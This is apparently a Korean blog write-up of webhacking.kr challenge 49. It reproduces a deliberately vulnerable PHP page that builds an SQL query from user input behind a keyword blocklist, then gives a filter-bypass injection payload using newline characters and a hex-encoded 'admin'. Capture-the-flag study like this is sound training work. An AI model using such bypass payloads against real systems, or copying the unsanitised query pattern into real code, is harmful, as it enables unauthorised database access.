<html>
<head>
<title>Challenge 49</title>
</head>
<body>
<h1>SQL INJECTION</h1>
<form method=get action=index.php>
level : <input name=lv value=1><input type=submit>
</form>
<?
if(time()<1258110000) exit();
if($_GET[lv])
{
if(eregi("union",$_GET[lv])) exit();
if(eregi("from",$_GET[lv])) exit();
if(eregi("select",$_GET[lv])) exit();
if(eregi("or",$_GET[lv])) exit();
if(eregi("and",$_GET[lv])) exit();
if(eregi("\(",$_GET[lv])) exit();
if(eregi("\)",$_GET[lv])) exit();
if(eregi("limit",$_GET[lv])) exit();
if(eregi(",",$_GET[lv])) exit();
if(eregi("/",$_GET[lv])) exit();
if(eregi("by",$_GET[lv])) exit();
if(eregi("desc",$_GET[lv])) exit();
if(eregi("asc",$_GET[lv])) exit();
if(eregi("cash",$_GET[lv])) exit();
if(eregi(" ",$_GET[lv])) exit();
if(eregi("%09",$_GET[lv])) exit();
$q=@mysql_fetch_array(mysql_query("select id from members where lv=$_GET[lv]"));
echo($q[0]);
if($q[0]=="admin") @solve();
}
?>
<!-- index.phps -->
</body>
</html>
필터된 문자
union
from
select
or
and
(, )
limit
,
/
by
desc
asc
cash
공백
%09
SELECT id from members where lv=$_GET[lv]
id가 admin이면 된다. lv=1000 || id=0x61646d696e
공백은 %0a로 채워준다. lv=1000%0a||%0aid=0x61646d696e%23
'WEB Hacking > webhacking.kr' 카테고리의 다른 글
| [webhacking.kr] 35번 SQL 인젝션 :: INSERT SQL 인젝션 (0) | 2018.09.10 |
|---|---|
| [webhacking.kr] 08번 :: INSERT SQL 인젝션 (0) | 2018.09.10 |
| [webhacking.kr] 9번 :: Blind SQL 인젝션 ::IF문 활용 (0) | 2018.09.08 |
| [webhacking.kr] 13번 Blind SQL 인젝션 equal bypass (0) | 2018.09.06 |
| [webhacking.kr] 40번 Blind SQL 인젝션 - Efficient Blind SQL 인젝션 스크립트 작성 (0) | 2018.09.04 |